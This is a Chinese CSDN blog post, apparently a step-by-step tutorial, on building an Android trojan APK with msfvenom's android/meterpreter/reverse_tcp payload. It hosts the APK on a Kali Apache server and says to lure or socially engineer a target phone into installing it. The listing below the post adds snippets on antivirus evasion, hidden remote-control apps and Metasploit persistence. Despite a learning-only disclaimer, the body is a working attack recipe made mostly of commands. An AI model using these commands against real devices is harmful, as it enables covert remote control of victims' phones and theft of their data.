移植到android_白帽子黑客给你演示:实战生成并移植安卓木马APK客户端文件

最新推荐文章于 2023-02-06 20:27:44 发布
最新推荐文章于 2023-02-06 20:27:44 发布
阅读量381 收藏 4
点赞数
文章标签: 移植到android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39654067/article/details/111698293
版权

声明:本头条号分享仅做学习交流,请自觉遵守网络安全法等法律法规!

据说点击了解更多,还有更多干货!但这干货有没有用,等你看了再说!

一、背景介绍

对于经常使用Kali Linux虚拟机的渗透小伙伴来说,我们大多数都是进行对PC端主机进行渗透,那么如何对Android主机进行木马攻击呢?如何生成.apk的木马文件呢?如何生成并移植安卓木马apk客户端文件呢?接下里让我们一起学习!

二、资源装备

1. 安装好Kali2020.2的虚拟机一台;

2. 整装待发的小白一个。

三、战略安排

3.1 生成木马文件(.apk文件),如下图所示。

命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.102 lport=4444 R>

12cd4cc5354c0ca7f21931cfb33a400b.png

3.2 重定向保存木马文件(.apk文件),如下图所示。

命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.102 lport=4444 R>/root/shell.apk

dfe6f2924ceadea7d42d9ad4c8cfb9f1.png

3.3 如下图所示,.apk的木马文件生成成功。

ad053fe7f17c59530c89b7d1b162f511.png

3.4 查看生成的.apk文件,如下图所示。

命令:ls

f452be474cfd7e73306fcccb7c2a0fc1.png

3.5 开启虚拟主机Kali Linux的apache服务,如下图所示。

命令:service apache2 start

5e64261d8db78d78456d83630138cc8c.png

3.6 将生成的.apk文件复制到Apache的指定路径下,如下图所示。

命令:cp shell.apk /var/www/html

1469027d99e05264864c422ddbb50a1b.png

3.7 查看虚拟主机IP,如下图所示

命令:ifconfig

b0ef348626542241e7334b85e9695b9d.png

3.8 使用(诱导/社工)目标Android主机访问Kali Linux虚拟机进行下载木马文件(.apk文件),安装完成,如下图所示。

命令:192.168.0.102/shell.apk

401f96b8e235bd1b762187c5ea7e5ea1.png
b026fdc88d5ff5b5daf09bfc012fd90a.png
9bcf507baff9a3f25474cf4d46f7335c.png
0570e875705b97e5717b9d9b9d2911b2.png

3.9 以上,木马(.apk文件)生成操作介绍完毕,谢谢观看!

weixin_39654067
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
木马常见植入技术大剖析
12-22
首先介绍了木马的定义,概括了木马的特征——隐蔽性、欺骗性、自启动性和自动恢复性,并简单介绍了木马的结构和功能。随后,从缓冲区溢出、网站挂马、电子邮件、QQ传播等方面介绍了木马的植入技术,重点从通信隐藏、进程隐藏、文件隐藏三个方面介绍了木马的隐藏技术,最后展望了木马技术的发展趋势。
Android 木马应用程序大名单
亚信安全-云安全博客
03-17 1201
Android Police网站针对他们所谓「Android所有恶意软件之母」的应用程序发表了相关细节,该程序是由互联网之声reddit网站的一位作者lompolo率先发现。
301网络安全之安卓木马程序
qq_43289307的博客
03-01 376
1.GSM系统   在GSM系统中,短消息主要包括以下重要部分:   (1)移动起始短消息:Mobile Originated Short Message。   GSM用户发送短消息时,必须知道最终地址的识别符,   (2)移动终接短消息:Mobile Terminated Short Message。   目的地为GSM用户的短消息必须首先先从发送方路由至短消息服务中心,然后再被路由至实际地址。...
Android发现恶意软件被植入木马
chengtiannen8716的博客
12-16 1166
根据国际先关的新闻报道,有安全人员发现了针对搭载Android系统的手机26款恶意软件,这些软件具有很高的危险性,其中一项是注入恶意软件开发者的股票软件。该情况发现地点为俄罗斯,针对于基于台湾联发科芯片组的手机威胁性最大。 通过对这些恶意软件分析,一旦手机链接网络,木马病毒就会自动链接...
app项目移植安卓系统
adomwon的博客
09-07 911
原本打算自己写,后来发现网上有些帖子写得很好,暂时就不写了,后面遇到问题再去补充 Android.mk官方网站 http://android.mk/ android系统源码中添加app源码(源码部署移植) https://blog.csdn.net/zhonglunshun/article/details/70256727 Android系统源码Build系统入门详解 https://blo...
史上最强Android木马”现身
06-08 1082
最近有媒体爆料,最高级的Android木马已经现身,据称“它能利用Android操作系统此前未知的漏洞提升程序权限,并能阻止被卸载。”该恶意程序被称为“Backdoor.AndroidOS.Obad.a”,其恶意行为是通过悄悄向增值服务号码发送短信获利。利用Android未曾发现漏洞并且无法卸载,“史上最强Android木马”有多神奇?就此,360手机安全专家为我们做了深度剖析,详解攻破“最强木马
Android木马病毒com.schemedroid的分析报告
Fly20141201. 的专栏
08-03 6455
某安全公司移动病毒分析报告的面试题目,该病毒样本的代码量比较大,最大的分析障碍是该病毒样本的类名称和类方法名称以及类成员变量的名称被混淆为无法辨认的特殊字符,每个被分析的类中所有的字符串都被加密处理了并且每个类的加密算法还不是一样的,人肉还原出被加密的字符串是很不现实的,该样本大约有100多个类,需要处理的加密字符串的解密高达几千个之多,有兴趣和能拿到样本的同学可以挑战一下自己,暂不提供样本。经...
一个简单的Android木马病毒的分析
墨鱼菜鸡
09-09 292
一、样本信息 文件名称:一个安卓病毒木马.apk 文件大小:242867byte 文件类型:application/jar 病毒名称:Android.Trojan.SMSSend.KS 样本MD5:05B009F8E6C30A1BC0A0F793049960BC 二、病毒行为分析 0x1...
利用meterpreter生成一个简单的android木马
weixin_30673715的博客
07-21 261
这个学习过程我是在kali linux下进行的,成功的感染了自己的手机,当然了apk包没改签名也没有加小图标,所以只能当是一个实验吧。 首先使用这个命令: 使用这个命令,可以生成一个apk包,但是我在这里标明一下,LHOST的IP写自己网络的IP,LPORT写一个没有被使用的端口,apk包名自己可以随意取。 接下来打开meterpreter软件: 加载模块: 之后设置宿主机的IP和监听端口:...
如何给apk安装包去毒,避免被识别为病毒和木马
05-29 8101
本文来源:安卓修改大师 如果您的应用经常被识别为病毒或者木马,将大大影响应用的推广,更影响您的收益。各种安卓平台的安全软件的监管规则越来越严格,您的应用可能一不小心就会进入病毒库,被识别为有害应用。有没有更好的办法来解决这个问题呢,通过部署安卓修改大师的随机打包防病毒系统,随机修改包名,签名和文件的特征码md5,并提供最新打包的应用分发给用户下载,以达到防毒的效果。大家请通过视频来了解随机打包防毒系统的功能。 第十五讲 如何给apk安装包去毒,避免被识别为病毒和木马 ...
一款强大的手机远控软件,无需ROOT
12-01
说明:软件安装完后桌面会出现 系统网络服务 的图标,先不要隐藏,设置好邮箱参数,测试下,正常后再进行隐藏!不需要ROOT!!! 注明:邮箱里的SMTP需要在自己邮箱里进行开启,不会的请自行百度!!
Metasploit生成Android木马远控自己的安卓设备
qq_59235193的博客
01-15 5331
我们先用frp工具来实现端口映射,利用处在内网的攻击机kali实现对处在外网
安卓手机渗透测试
11-04
移动安全是当下最热门的话题之一。安卓系统最为市场上占有量最高的移动操作系统,拥有极其广泛的用户基础,大量的个人数据和商业数据都存储在安卓移动设备上。本专栏将从最基础的实验环境搭建,软件安装使用开始讲。没有复杂的原理讲解,更多的实践操作,小白也能跟着从零开始学起。注意:本教程内容仅用于网络安全学习研究,未经授权的入侵需要自己承担相应的责任,与作者无关。
反编译简单分析metasploit生成安卓木马
最新发布
Aiwin的博客
02-06 1311
apk反编译简单分析metasploit的安卓木马
android木马的制作方法,实现木马病毒的详细步骤
热门推荐
weixin_28292761的博客
05-27 1万+
前言:有没有遇到过这种情况,打开邮件,发现一封非常正常的邮件,附带了连接,你不以为然的点进去,结果中木马病毒了,这个套路是不是很熟悉,也很老套,但稍不注意就容易中木马病毒,希拉里邮件门事件不就是这样么?!作为一名程序员,你是否想过怎样实现这样一个木马病毒呢?来吧,这个项目就带你学习如何通过Metasploit的msfvenom命令来生成木马、捆绑木马以及对木马进行免杀处理,带你一步步了解如何制作一...
关于metasploit的木马免杀,维持权限以及进程迁移
m0_46682482的博客
07-22 2362
hi,大家好,我是铁汉fhoenix。这里我为各位总结一下msf的免杀,维持以及进程迁移。 1.在目标运行M马,取得shell以后。可以先查询进程然后进行注入,这里我们用最简单的方法。直接输入run post/windows/manage/migrate 模块注入它会自动寻找合适的进程注入,并且自动迁移进程。 2.通过msf自带的persistence模块可以设置启动项来进行维持。下面我来解释一下,拿到shell以后输入run persistence -P windows/x64/mete.
Kali之安卓木马
李木一的博客
02-24 1万+
Kali linux初体验Kali linux的安卓木马一般只能在内网操作,要想在监控互联网的安卓手机,必须要使用内网穿透,工具有很多,我使用的是NATAPP。思路如下:实现内网穿透Metasploit木马操作一、实现内网穿透进入https://natapp.cn/,根据提示注册并创建免费隧道进入https://natapp.cn/#download下载linux的客户端命令行内启动natapp。...
原创:违章查询.apk---android木马分析手记
家有牛小的博客
11-25 2239
写在前面:前段时间的一个手机木马,一直没时间去分析。现在有点时间简单作了分析,虽然过了时效,但为了研究技术,还是放出来看看吧。大神自动跳过。 一、来源:        朋友的手机上收到一条短信,冒充交警部门提示有违章的罚单未处理,详情请点击:http://url.cn/XXXX 点击后下载一名为“违章查询.apk”,安装后如下所示: 写在前面:前段时间的一个手机木马,一直没时间去分
Android系统移植全面指南:从零到实战
本篇教程详细介绍了Android系统移植过程中的关键知识点,旨在帮助读者深入理解并掌握Android平台的底层架构和移植方法。课程由薛土林编著,版权归Farsight所有,适合对Android开发有兴趣或需要进行系统移植的专业...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值